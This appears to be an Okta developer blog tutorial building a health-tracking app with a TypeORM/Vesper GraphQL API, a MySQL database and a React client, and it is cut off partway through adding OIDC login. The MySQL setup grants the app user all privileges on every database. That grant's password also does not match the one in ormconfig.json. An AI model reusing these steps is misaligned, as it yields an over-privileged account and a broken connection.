In short, we make identity management a lot easier, more secure, and more scalable than what you’re used to. Okta is a cloud service that allows developers to create, edit, and securely store user accounts and user account data, and connect them with one or multiple applications. Our API enables you to:

Are you sold? Register for a forever-free developer account, and when you’re done, come on back so we can learn more about building secure apps in React!

Why a Health Tracking App?

In late September through mid-October 2014, I’d done a 21-Day Sugar Detox during which I stopped eating sugar, started exercising regularly, and stopped drinking alcohol. I’d had high blood pressure for over ten years and was on blood-pressure medication at the time. During the first week of the detox, I ran out of blood-pressure medication. Since a new prescription required a doctor visit, I decided I’d wait until after the detox to get it. After three weeks, not only did I lose 15 pounds, but my blood pressure was at normal levels!

Before I started the detox, I came up with a 21-point system to see how healthy I was each week. Its rules were simple: you can earn up to three points per day for the following reasons:

  1. If you eat healthy, you get a point. Otherwise, zero.
  2. If you exercise, you get a point.
  3. If you don’t drink alcohol, you get a point.

I was surprised to find I got eight points the first week I used this system. During the detox, I got 16 points the first week, 20 the second, and 21 the third. Before the detox, I thought eating healthy meant eating anything except fast food. After the detox, I realized that eating healthy for me meant eating no sugar. I’m also a big lover of craft beer, so I modified the alcohol rule to allow two healthier alcohol drinks (like a greyhound or red wine) per day.

My goal is to earn 15 points per week. I find that if I get more, I’ll likely lose weight and have good blood pressure. If I get fewer than 15, I risk getting sick. I’ve been tracking my health like this since September 2014. I’ve lost weight, and my blood pressure has returned to and maintained normal levels. I haven’t had good blood pressure since my early 20s, so this has been a life changer for me.

I built 21-Points Health to track my health. I figured it’d be fun to recreate a small slice of that app, just tracking daily points.

Building an API with TypeORM, GraphQL, and Vesper

TypeORM is a nifty ORM (object-relational mapper) framework that can run in most JavaScript platforms, including Node, a browser, Cordova, React Native, and Electron. It’s heavily influenced by Hibernate, Doctrine, and Entity Framework. Install TypeORM globally to begin creating your API.

npm i -g typeorm@0.2.7

Create a directory to hold the React client and GraphQL API.

mkdir health-tracker
cd health-tracker

Create a new project with MySQL using the following command:

typeorm init --name graphql-api --database mysql

Edit graphql-api/ormconfig.json to customize the username, password, and database.

{
    ...
    "username": "health",
    "password": "pointstest",
    "database": "healthpoints",
    ...
}

TIP: To see the queries being executed against MySQL, change the “logging” value in this file to be “all”. Many other logging options are available too.

Install MySQL

Install MySQL if you don’t already have it installed. On Ubuntu, you can use sudo apt-get install mysql-server. On macOS, you can use Homebrew and brew install mysql. For Windows, you can use the MySQL Installer.

Once you’ve got MySQL installed and configured with a root password, login and create a healthpoints database.

mysql -u root -p
create database healthpoints;
use healthpoints;
grant all privileges on *.* to 'health'@'localhost' identified by 'points';

Navigate to your graphql-api project in a terminal window, install the project’s dependencies, then start it to ensure you can connect to MySQL.

cd graphql-api
npm i
npm start

You should see the following output:

Inserting a new user into the database...
Saved a new user with id: 1
Loading users from the database...
Loaded users:  [ User { id: 1, firstName: 'Timber', lastName: 'Saw', age: 25 } ]
Here you can setup and run express/koa/any other framework.

Install Vesper to Integrate TypeORM and GraphQL

Vesper is a Node framework that integrates TypeORM and GraphQL. To install it, use good ol’ npm.

npm i vesper@0.1.9

Now it’s time to create some GraphQL models (that define what your data looks like) and some controllers (that explain how to interact with your data).

Create graphql-api/src/schema/model/Points.graphql:

type Points {
  id: Int
  date: Date
  exercise: Int
  diet: Int
  alcohol: Int
  notes: String
  user: User
}

Create graphql-api/src/schema/model/User.graphql:

type User {
  id: String
  firstName: String
  lastName: String
  points: [Points]
}

Next, create a graphql-api/src/schema/controller/PointsController.graphql with queries and mutations:

type Query {
  points: [Points]
  pointsGet(id: Int): Points
  users: [User]
}

type Mutation {
  pointsSave(id: Int, date: Date, exercise: Int, diet: Int, alcohol: Int, notes: String): Points
  pointsDelete(id: Int): Boolean
}

Now that your data has GraphQL metadata create entities that will be managed by TypeORM. Change src/entity/User.ts to have the following code that allows points to be associated with a user.

import { Column, Entity, OneToMany, PrimaryColumn } from 'typeorm';
import { Points } from './Points';

@Entity()
export class User {

  @PrimaryColumn()
  id: string;

  @Column()
  firstName: string;

  @Column()
  lastName: string;

  @OneToMany(() => Points, points => points.user)
  points: Points[];
}

In the same src/entity directory, create a Points.ts class with the following code.

import { Entity, PrimaryGeneratedColumn, Column, ManyToOne } from 'typeorm';
import { User } from './User';

@Entity()
export class Points {

  @PrimaryGeneratedColumn()
  id: number;

  @Column({ type: 'timestamp', default: () => 'CURRENT_TIMESTAMP'})
  date: Date;

  @Column()
  exercise: number;

  @Column()
  diet: number;

  @Column()
  alcohol: number;

  @Column()
  notes: string;

  @ManyToOne(() => User, user => user.points, { cascade: ["insert"] })
  user: User|null;
}

Note the cascade: ["insert"] option on the @ManyToOne annotation above. This option will automatically insert a user if it’s present on the entity. Create src/controller/PointsController.ts to handle converting the data from your GraphQL queries and mutations.

import { Controller, Mutation, Query } from 'vesper';
import { EntityManager } from 'typeorm';
import { Points } from '../entity/Points';

@Controller()
export class PointsController {

  constructor(private entityManager: EntityManager) {
  }

  // serves "points: [Points]" requests
  @Query()
  points() {
    return this.entityManager.find(Points);
  }

  // serves "pointsGet(id: Int): Points" requests
  @Query()
  pointsGet({id}) {
    return this.entityManager.findOne(Points, id);
  }

  // serves "pointsSave(id: Int, date: Date, exercise: Int, diet: Int, alcohol: Int, notes: String): Points" requests
  @Mutation()
  pointsSave(args) {
    const points = this.entityManager.create(Points, args);
    return this.entityManager.save(Points, points);
  }

  // serves "pointsDelete(id: Int): Boolean" requests
  @Mutation()
  async pointsDelete({id}) {
    await this.entityManager.remove(Points, {id: id});
    return true;
  }
}

Change src/index.ts to use Vesper’s bootstrap() to configure everything.

import { bootstrap } from 'vesper';
import { PointsController } from './controller/PointsController';
import { Points } from './entity/Points';
import { User } from './entity/User';

bootstrap({
  port: 4000,
  controllers: [
    PointsController
  ],
  entities: [
    Points,
    User
  ],
  schemas: [
    __dirname + '/schema/**/*.graphql'
  ],
  cors: true
}).then(() => {
  console.log('Your app is up and running on http://localhost:4000. ' +
    'You can use playground in development mode on http://localhost:4000/playground');
}).catch(error => {
  console.error(error.stack ? error.stack : error);
});

This code tells Vesper to register controllers, entities, GraphQL schemas, to run on port 4000, and to enable CORS (cross-origin resource sharing).

Start your API using npm start and navigate to http://localhost:4000/playground. In the left pane, enter the following mutation and press the play button. You might try typing the code below so you can experience the code completion that GraphQL provides you.

mutation {
  pointsSave(exercise:1, diet:1, alcohol:1, notes:"Hello World") {
    id
    date
    exercise
    diet
    alcohol
    notes
  }
}

Your result should look similar to mine.

GraphQL Playground

You can click the “SCHEMA” tab on the right to see the available queries and mutations. Pretty slick, eh?!

You can use the following points query to verify that data is in your database.

query {
  points {id date exercise diet notes}
}

Fix Dates

You might notice that the date returned from pointsSave and the points query is in a format the might be difficult for a JavaScript client to understand. You can fix that, install graphql-iso-date.

npm i graphql-iso-date@3.5.0

Then, add an import in src/index.ts and configure custom resolvers for the various date types. This example only uses Date, but it’s helpful to know the other options.

import { GraphQLDate, GraphQLDateTime, GraphQLTime } from 'graphql-iso-date';

bootstrap({
  ...
  // https://github.com/vesper-framework/vesper/issues/4
  customResolvers: {
    Date: GraphQLDate,
    Time: GraphQLTime,
    DateTime: GraphQLDateTime
  },
  ...
});

Now running the points query will return a more client-friendly result.

{
  "data": {
    "points": [
      {
        "id": 1,
        "date": "2018-06-04",
        "exercise": 1,
        "diet": 1,
        "notes": "Hello World"
      }
    ]
  }
}

You’ve written an API with GraphQL and TypeScript in about 20 minutes. How cool is that?! There’s still work to do though. In the next sections, you’ll create a React client for this API and add authentication with OIDC. Adding authentication will give you the ability to get the user’s information and associate a user with their points.

Get Started with React

One of the quickest ways to get started with React is to use Create React App. Install the latest release using the command below.

npm i -g create-react-app@1.1.4

Navigate to the directory where you created your GraphQL API and create a React client.

cd health-tracker
create-react-app react-client

Install the dependencies you’ll need to talk to integrate Apollo Client with React, as well as Bootstrap and reactstrap.

npm i apollo-boost@0.1.7 react-apollo@2.1.4 graphql-tag@2.9.2 graphql@0.13.2

Configure Apollo Client for Your API

Open react-client/src/App.js and import ApolloClient from apollo-boost and add the endpoint to your GraphQL API.

import ApolloClient from 'apollo-boost';

const client = new ApolloClient({
  uri: "http://localhost:4000/graphql"
});

That’s it! With only three lines of code, your app is ready to start fetching data. You can prove it by importing the gql function from graphql-tag. This will parse your query string and turn it into a query document.

import gql from 'graphql-tag';

class App extends Component {

  componentDidMount() {
    client.query({
      query: gql`
        {
          points {
            id date exercise diet alcohol notes
          }
        }
      `
    })
    .then(result => console.log(result));
  }
...
}

Make sure to open your browser’s developer tools so you can see the data after making this change. You could modify the console.log() to use this.setState({points: results.data.points}), but then you’d have to initialize the default state in the constructor. But there’s an easier way: you can use ApolloProvider and Query components from react-apollo!

Below is a modified version of react-client/src/App.js that uses these components.

import React, { Component } from 'react';
import logo from './logo.svg';
import './App.css';
import ApolloClient from 'apollo-boost';
import gql from 'graphql-tag';
import { ApolloProvider, Query } from 'react-apollo';
const client = new ApolloClient({
  uri: "http://localhost:4000/graphql"
});

class App extends Component {

  render() {
    return (
      <ApolloProvider client={client}>
        <div className="App">
          <header className="App-header">
            <img src={logo} className="App-logo" alt="logo" />
            <h1 className="App-title">Welcome to React</h1>
          </header>
          <p className="App-intro">
            To get started, edit <code>src/App.js</code> and save to reload.
          </p>
          <Query query={gql`
            {
              points {id date exercise diet alcohol notes}
            }
          `}>
            {({loading, error, data}) => {
              if (loading) return <p>Loading...</p>;
              if (error) return <p>Error: {error}</p>;
              return data.points.map(p => {
                return <div key={p.id}>
                  <p>Date: {p.date}</p>
                  <p>Points: {p.exercise + p.diet + p.alcohol}</p>
                  <p>Notes: {p.notes}</p>
                </div>
              })
            }}
          </Query>
        </div>
      </ApolloProvider>
    );
  }
}

export default App;

You’ve built a GraphQL API and a React UI that talks to it - excellent work! However, there’s still more to do. In the next sections, I’ll show you how to add authentication to React, verify JWTs with Vesper, and add CRUD functionality to the UI. CRUD functionality already exists in the API thanks to the mutations you wrote earlier.

Add Authentication for React with OpenID Connect

You’ll need to configure React to use Okta for authentication. You’ll need to create an OIDC app in Okta for that.

Log in to your Okta Developer account (or sign up if you don’t have an account) and navigate to Applications > Add Application. Click Single-Page App, click Next, and give the app a name you’ll remember. Change all instances of localhost:8080 to localhost:3000 and click Done. Your settings should be similar to the screenshot below.

OIDC App Settings

Okta’s React SDK allows you to integrate OIDC into a React application. To install, run the following commands:

npm i @okta/okta-react@1.0.2 react-router-dom@4.2.2

Okta’s React SDK depends on react-router, hence the reason for installing react-router-dom. Configuring routing in client/src/App.tsx is a common practice, so replace its code with the JavaScript below that sets up authentication with Okta.

import React, { Component } from 'react';
import { BrowserRouter as Router, Route } from 'react-router-dom';
import { ImplicitCallback, SecureRoute, Security } from '@okta/okta-react';
import Home from './Home';
import Login from './Login';
import Points from './Points';

function onAuthRequired({history}) {
  history.push('/login');
}

class App extends Component {
  render() {
    return (
      <Router>
        <Security issuer='.com/oauth2/default'
                  client_id='{yourClientId}'
                  redirect_uri={window.location.origin + '/implicit/callback'}
                  onAuthRequired={onAuthRequired}>
          <Route path='/' exact={true} component={Home}/>
          <SecureRoute path='/points' component={Points}/>
          <Route path=